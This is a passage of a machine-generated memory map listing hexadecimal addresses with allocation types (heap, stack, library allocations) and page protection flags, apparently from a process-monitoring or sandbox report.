page read and write
97F0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
86DF000
trusted library allocation
page read and write
9AD0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
F7DC47E000
stack
page read and write
85D0000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1DE9A480000
heap
page read and write
A5B0000
trusted library allocation
page read and write
A5E0000
trusted library section
page read and write
8620000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
3ACE3FC000
stack
page read and write
8830000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
27C54C29000
heap
page read and write
A620000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
24CB4E00000
heap
page read and write
7B90000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
2177EE54000
heap
page read and write
9D0D000
unkown
page read and write
334E77C000
stack
page read and write
8830000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page execute and read and write
2177EE5A000
heap
page read and write
BDD4000
trusted library allocation
page read and write
93F5000
trusted library allocation
page read and write
1A91A018000
trusted library allocation
page read and write
219E6475000
heap
page read and write
95F0000
unkown
page read and write
A660000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
99B3000
trusted library allocation
page read and write
DD4EF7E000
stack
page read and write
A620000
trusted library allocation
page read and write
B227000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
2725A5F9000
heap
page read and write
9930000
trusted library allocation
page read and write
2177EE61000
heap
page read and write
6468000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
1DE9AD73000
heap
page read and write
8830000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
A7A0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
7458000
trusted library allocation
page read and write
5CAD000
trusted library allocation
page read and write
BAD1000
trusted library allocation
page read and write
53A0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
B83000
heap
page read and write
B417000
trusted library allocation
page read and write
99E0000
trusted library allocation
page execute and read and write
95D0000
trusted library allocation
page read and write
62E5EFE000
stack
page read and write
334E8FE000
stack
page read and write
B5B6000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
1DE9ADA0000
heap
page read and write
219E647E000
heap
page read and write
98C0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
8840000
unkown
page read and write
85B0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
9780000
trusted library allocation
page read and write
269D8160000
heap
page read and write
B560000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
219E6496000
heap
page read and write
95D0000
trusted library allocation
page read and write
9400000
unkown
page read and write
1DE9ADB1000
heap
page read and write
97B0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
BDCE000
trusted library allocation
page read and write
B61B000
trusted library allocation
page read and write
14C09B80000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
2725B100000
unkown
page read and write
97F0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
97F8000
trusted library allocation
page read and write
1DE9A2B0000
heap
page read and write
9870000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
93D0000
unkown
page read and write
97F5000
trusted library allocation
page read and write
CCA000
heap
page read and write
8830000
unkown
page read and write
A5C0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
96E5000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
8590000
trusted library allocation
page read and write
1380000
direct allocation
page read and write
1DE9AD7B000
heap
page read and write
96D0000
trusted library allocation
page read and write
340B000
heap
page read and write
B410000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
8830000
unkown
page read and write
D24847B000
stack
page read and write
CCD000
heap
page read and write
1320000
direct allocation
page read and write
5CB7000
trusted library allocation
page read and write
96E0000
unkown
page read and write
B430000
trusted library allocation
page execute and read and write
D17000
heap
page read and write
97E0000
trusted library allocation
page read and write
A70E000
stack
page read and write
EFAFDBE000
stack
page read and write
97F0000
trusted library allocation
page read and write
9765000
unkown
page read and write
86E0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
CD9000
heap
page read and write
B530000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
93D0000
unkown
page read and write
1A9151E1000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
1DE9AD81000
heap
page read and write
B580000
trusted library allocation
page read and write
EE239FB000
stack
page read and write
2177EE75000
heap
page read and write
1DE9B200000
heap
page read and write
8830000
trusted library allocation
page read and write
5E0000
heap
page read and write
95D0000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9940000
trusted library allocation
page execute and read and write
98A5000
trusted library allocation
page read and write
95D5000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
5DC0000
trusted library allocation
page read and write
FE0000
trusted library allocation
page read and write
535E000
stack
page read and write
A570000
trusted library allocation
page read and write
1A915200000
heap
page read and write
B410000
trusted library allocation
page read and write
FC0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
B180000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
55C000
stack
page read and write
A570000
trusted library allocation
page read and write
9650000
unkown
page read and write
C670000
trusted library allocation
page read and write
6044000
trusted library allocation
page read and write
C9B000
heap
page read and write
A640000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
1380000
direct allocation
page read and write
93D0000
unkown
page read and write
C2E000
heap
page read and write
1A915AE0000
trusted library section
page readonly
C33000
heap
page read and write
A620000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
DD4EBFE000
stack
page read and write
13B1000
direct allocation
page read and write
9410000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
138F000
direct allocation
page read and write
81E3000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
1340000
direct allocation
page read and write
8837000
unkown
page read and write
97D0000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
C00000
direct allocation
page read and write
219E6350000
heap
page read and write
8836000
trusted library allocation
page read and write
98CE000
trusted library allocation
page read and write
1DE9AD52000
heap
page read and write
97D0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
30F0000
remote allocation
page read and write
3409000
heap
page read and write
95E0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
1DE9AD0B000
heap
page read and write
A790000
trusted library allocation
page read and write
98C3000
trusted library allocation
page read and write
B441000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
9728000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9930000
unkown
page read and write
B400000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
14C09C00000
heap
page read and write
F4E000
stack
page read and write
96E7000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
4845000
trusted library allocation
page read and write
7810000
trusted library allocation
page execute and read and write
8835000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
97B0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
B86D000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
219E6466000
heap
page read and write
98A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
B660000
trusted library allocation
page execute and read and write
2725B10A000
unkown
page read and write
9A90000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
8620000
unkown
page read and write
F7DC679000
stack
page read and write
9750000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
6F20000
heap
page read and write
A600000
trusted library allocation
page read and write
B450000
trusted library allocation
page execute and read and write
5DD6000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
2177EE5D000
heap
page read and write
97E0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
2A409B00000
heap
page read and write
97F0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
8830000
unkown
page read and write
9890000
trusted library allocation
page read and write
24CB4E13000
heap
page read and write
A573000
trusted library allocation
page read and write
B871000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
DD4F37F000
stack
page read and write
B450000
trusted library allocation
page read and write
6466000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
24009A79000
heap
page read and write
45D000
stack
page read and write
F7DC5F9000
stack
page read and write
CED000
heap
page read and write
93D0000
trusted library allocation
page read and write
D209000
stack
page read and write
7B80000
trusted library allocation
page read and write
219E6460000
heap
page read and write
8620000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
93D0000
unkown
page read and write
76B0000
trusted library allocation
page read and write
95D5000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
24009A13000
heap
page read and write
97F0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
95D0000
trusted library allocation
page read and write
93D8000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
95D6000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
8830000
unkown
page read and write
86C0000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
27C54D08000
heap
page read and write
95E0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9F9000
stack
page read and write
53F8000
heap
page read and write
74E0000
trusted library allocation
page read and write
1DE9A4AC000
heap
page read and write
334EC7D000
stack
page read and write
25969BB0000
heap
page read and write
9870000
trusted library allocation
page read and write
B500000
trusted library allocation
page read and write
24CB5713000
heap
page read and write
1DE9AD79000
heap
page read and write
9930000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
1A915300000
heap
page read and write
B4E0000
trusted library allocation
page read and write
25969E13000
heap
page read and write
9785000
trusted library allocation
page read and write
2177ED80000
heap
page read and write
1A91A261000
heap
page read and write
30F0000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
62E5C7E000
stack
page read and write
2725A590000
heap
page read and write
B5D000
heap
page read and write
9940000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
1DE9B23E000
heap
page read and write
95D0000
trusted library allocation
page read and write
5840000
heap
page read and write
B480000
trusted library allocation
page read and write
A59D000
trusted library allocation
page read and write
9DCE000
unkown
page read and write
9810000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
7630000
trusted library allocation
page execute and read and write
1270000
heap
page read and write
B440000
trusted library allocation
page read and write
B540000
trusted library allocation
page read and write
5E35000
trusted library allocation
page read and write
93D0000
unkown
page read and write
1A91A040000
trusted library allocation
page read and write
CD3000
heap
page read and write
97F0000
trusted library allocation
page read and write
C20000
direct allocation
page read and write
A790000
trusted library allocation
page read and write
6CD000
stack
page read and write
9750000
trusted library allocation
page read and write
5E5A000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
EFAFD3F000
stack
page read and write
2A4098C0000
heap
page read and write
1DE9AD7C000
heap
page read and write
27C55402000
trusted library allocation
page read and write
8180000
trusted library allocation
page read and write
764D000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
5D6A000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
4CCE000
stack
page read and write
86D497E000
stack
page read and write
93D5000
unkown
page read and write
B1E000
stack
page read and write
1DE9AD7B000
heap
page read and write
95E0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
AD0000
heap
page read and write
A620000
trusted library allocation
page read and write
9B70000
trusted library allocation
page execute and read and write
269D81D0000
heap
page read and write
1DE9B202000
heap
page read and write
9930000
trusted library allocation
page read and write
D2D000
heap
page read and write
1A915202000
heap
page read and write
8580000
trusted library allocation
page read and write
5E28000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
488F000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
645D000
trusted library allocation
page read and write
219E6445000
heap
page read and write
CDB000
heap
page read and write
1DE9A4EC000
heap
page read and write
9780000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
1A915E63000
trusted library allocation
page read and write
1A914AFB000
heap
page read and write
A650000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
1EB27FE000
stack
page read and write
D30000
heap
page read and write
B4F0000
trusted library allocation
page read and write
219E62F0000
heap
page read and write
85B0000
trusted library allocation
page read and write
1DE9AD99000
heap
page read and write
B410000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8620000
unkown
page read and write
97E0000
trusted library allocation
page read and write
8718000
trusted library allocation
page read and write
1DE9AD98000
heap
page read and write
A570000
trusted library allocation
page read and write
98D7000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
13A0000
direct allocation
page read and write
1A915318000
heap
page read and write
8830000
trusted library allocation
page read and write
1A914B13000
heap
page read and write
F7DC7FF000
unkown
page read and write
14C09C5E000
heap
page read and write
85C4000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9406000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
1DE9AD24000
heap
page read and write
A610000
trusted library allocation
page read and write
4810000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
5D12000
trusted library allocation
page read and write
2725B3D0000
unkown
page read and write
9610000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
24009B02000
heap
page read and write
95F0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
97F8000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
219E644E000
heap
page read and write
97F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
5D41000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
334E9FE000
stack
page read and write
9860000
trusted library allocation
page read and write
B415000
trusted library allocation
page read and write
5ACE000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
4E0000
remote allocation
page read and write
B520000
trusted library allocation
page read and write
2725B420000
unkown
page read and write
B410000
trusted library allocation
page read and write
2A409B13000
heap
page read and write
24009B13000
heap
page read and write
2880C8FF000
heap
page read and write
95D0000
trusted library allocation
page read and write
1A919EF0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
B250000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9735000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
CCD000
heap
page read and write
3ACE47E000
stack
page read and write
B279000
trusted library allocation
page read and write
1EB20FC000
stack
page read and write
99B0000
unkown
page read and write
A573000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
C92000
heap
page read and write
95D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
10BE000
stack
page read and write
A630000
trusted library allocation
page read and write
1DE9B203000
heap
page read and write
96E0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
269D823E000
heap
page read and write
8838000
unkown
page read and write
BB83000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
95D4000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
5DC8000
trusted library allocation
page read and write
97E000
stack
page read and write
9400000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
48A0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
62E5F7F000
stack
page read and write
2A409920000
heap
page read and write
1A914A29000
heap
page read and write
9610000
trusted library allocation
page read and write
13DC000
direct allocation
page read and write
98B0000
trusted library allocation
page execute and read and write
BD29000
trusted library allocation
page read and write
4830000
trusted library allocation
page read and write
219E6446000
heap
page read and write
97F0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
3ACE9F8000
stack
page read and write
A630000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
93E0000
unkown
page read and write
95F5000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9A95000
trusted library allocation
page read and write
5FBA000
trusted library allocation
page read and write
8835000
unkown
page read and write
97D0000
trusted library allocation
page read and write
1EB26FF000
stack
page read and write
1074000
heap
page read and write
9790000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
7B98000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1A914A75000
heap
page read and write
3160000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4D0E000
stack
page read and write
2177ED10000
heap
page read and write
A650000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
4841000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
EFE000
stack
page read and write
93D0000
trusted library allocation
page read and write
95DD000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
2880C8A0000
heap
page read and write
97D0000
trusted library allocation
page read and write
5CE000
stack
page read and write
1DE9A43C000
heap
page read and write
1DE9AD7B000
heap
page read and write
24009990000
trusted library allocation
page read and write
1DE9ADB7000
heap
page read and write
9F9000
stack
page read and write
25969F08000
heap
page read and write
97D0000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
7F30000
trusted library allocation
page read and write
8830000
unkown
page read and write
9635000
trusted library allocation
page read and write
BC0000
direct allocation
page read and write
9660000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
219E6442000
heap
page read and write
1DE9AD98000
heap
page read and write
2880C8E2000
heap
page read and write
9400000
trusted library allocation
page read and write
62E57FB000
stack
page read and write
A560000
trusted library allocation
page read and write
1A9149E0000
trusted library allocation
page read and write
13A4000
direct allocation
page read and write
171F8702000
heap
page read and write
9740000
trusted library allocation
page read and write
33A8000
heap
page read and write
B5E0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
93D0000
unkown
page read and write
2880C750000
heap
page read and write
7FEC000
direct allocation
page read and write
1DE9AD96000
heap
page read and write
32BE000
stack
page read and write
8835000
unkown
page read and write
A610000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
D7A817E000
stack
page read and write
9940000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
1EB1B9B000
stack
page read and write
1360000
direct allocation
page read and write
9400000
trusted library allocation
page read and write
1A914A13000
heap
page read and write
1A91A2DD000
heap
page read and write
9870000
trusted library allocation
page read and write
48E9000
trusted library allocation
page read and write
2177EE90000
heap
page read and write
B410000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
DD4F07B000
stack
page read and write
2725B150000
unkown
page read and write
C30000
heap
page read and write
C7C000
heap
page read and write
3160000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
1DE9AB30000
remote allocation
page read and write
7450000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
24009A57000
heap
page read and write
BD2000
direct allocation
page read and write
97F0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
1DE9AD7A000
heap
page read and write
86D419B000
stack
page read and write
A790000
trusted library allocation
page read and write
2177F602000
trusted library allocation
page read and write
B570000
trusted library allocation
page read and write
97B9000
trusted library allocation
page read and write
B72E000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
1A91A140000
trusted library allocation
page read and write
9400000
unkown
page read and write
98A0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
2A409A47000
heap
page read and write
27C55350000
trusted library allocation
page read and write
CAE000
heap
page read and write
E2172FE000
stack
page read and write
C68C000
trusted library allocation
page read and write
5D72000
trusted library allocation
page read and write
B1F0000
trusted library allocation
page read and write
9BA0000
trusted library allocation
page read and write
1DE9A4B6000
heap
page read and write
8830000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
C3CD8FD000
stack
page read and write
1DE9A4C1000
heap
page read and write
B440000
trusted library allocation
page read and write
2177EF13000
heap
page read and write
B447000
trusted library allocation
page read and write
1A91A010000
trusted library allocation
page read and write
171F8713000
heap
page read and write
9810000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
B490000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
1A9159E0000
trusted library allocation
page read and write
5380000
heap
page read and write
9750000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
9BB0000
trusted library allocation
page read and write
BA8E000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
9405000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
BE0000
direct allocation
page read and write
93E0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
1DE9AD97000
heap
page read and write
95D5000
trusted library allocation
page read and write
98A0000
trusted library allocation
page execute and read and write
2A4098B0000
heap
page read and write
A790000
trusted library allocation
page read and write
74F0000
trusted library allocation
page read and write
B4D000
heap
page read and write
9780000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
4851000
trusted library allocation
page read and write
CD9000
heap
page read and write
9400000
trusted library allocation
page read and write
B425000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
CD8000
heap
page read and write
9930000
trusted library allocation
page read and write
93D0000
unkown
page read and write
9780000
trusted library allocation
page read and write
219E6467000
heap
page read and write
1A91A160000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
E6D6DFF000
stack
page read and write
1DE9AD7C000
heap
page read and write
99B0000
trusted library allocation
page read and write
5230000
trusted library section
page read and write
BA6F000
trusted library allocation
page read and write
CB9000
heap
page read and write
C6A5000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
C3E000
heap
page read and write
97F0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
5260000
trusted library allocation
page read and write
31A0000
heap
page read and write
E6D6D7E000
stack
page read and write
2177EDB0000
trusted library allocation
page read and write
8839000
trusted library allocation
page read and write
B590000
trusted library allocation
page read and write
24009A3E000
heap
page read and write
305C000
stack
page read and write
95D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A5C9000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
1A915359000
heap
page read and write
9766000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
93F5000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
490000
heap
page read and write
30F0000
trusted library allocation
page read and write
7CC000
stack
page read and write
A600000
trusted library allocation
page read and write
81BA000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
2880CA65000
heap
page read and write
A640000
trusted library allocation
page read and write
24009A00000
heap
page read and write
1A91A2F9000
heap
page read and write
7816000
trusted library allocation
page read and write
5E0F000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9650000
unkown
page read and write
99A0000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
219E6380000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
A620000
trusted library allocation
page read and write
760D000
trusted library allocation
page read and write
98A4000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
832C000
stack
page read and write
219E6483000
heap
page read and write
9932000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
EE23AF7000
stack
page read and write
8830000
unkown
page read and write
8830000
trusted library allocation
page read and write
940C000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
B4F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
526D000
trusted library allocation
page execute and read and write
96E0000
unkown
page read and write
1DE9AD9A000
heap
page read and write
9790000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
1A915501000
trusted library allocation
page read and write
CA1000
heap
page read and write
B48000
heap
page read and write
9785000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
BC0000
direct allocation
page read and write
95D0000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
B4C0000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
1DE9A4D8000
heap
page read and write
9930000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
4876000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
B220000
trusted library allocation
page read and write
97F5000
trusted library allocation
page read and write
9623000
trusted library allocation
page read and write
6002000
trusted library allocation
page read and write
6DA7000
direct allocation
page read and write
5D30000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
1DE9AD7B000
heap
page read and write
2400A202000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
80FE000
stack
page read and write
1DE9AD76000
heap
page read and write
D7A807D000
stack
page read and write
EFB0078000
stack
page read and write
4833000
trusted library allocation
page read and write
F7DC57D000
stack
page read and write
9814000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
5E63000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
6451000
trusted library allocation
page read and write
93D0000
unkown
page read and write
8628000
unkown
page read and write
2177EE3C000
heap
page read and write
97F0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
CE6000
heap
page read and write
B671000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
1A914A56000
heap
page read and write
9650000
unkown
page read and write
85D0000
trusted library allocation
page read and write
A5D8000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
A5FE000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
A664000
trusted library allocation
page read and write
86E2000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
5DE7000
trusted library allocation
page read and write
B500000
trusted library allocation
page read and write
D7A7A7E000
stack
page read and write
95F6000
unkown
page read and write
A5C0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
3100000
trusted library allocation
page read and write
767D000
trusted library allocation
page read and write
A5F3000
trusted library allocation
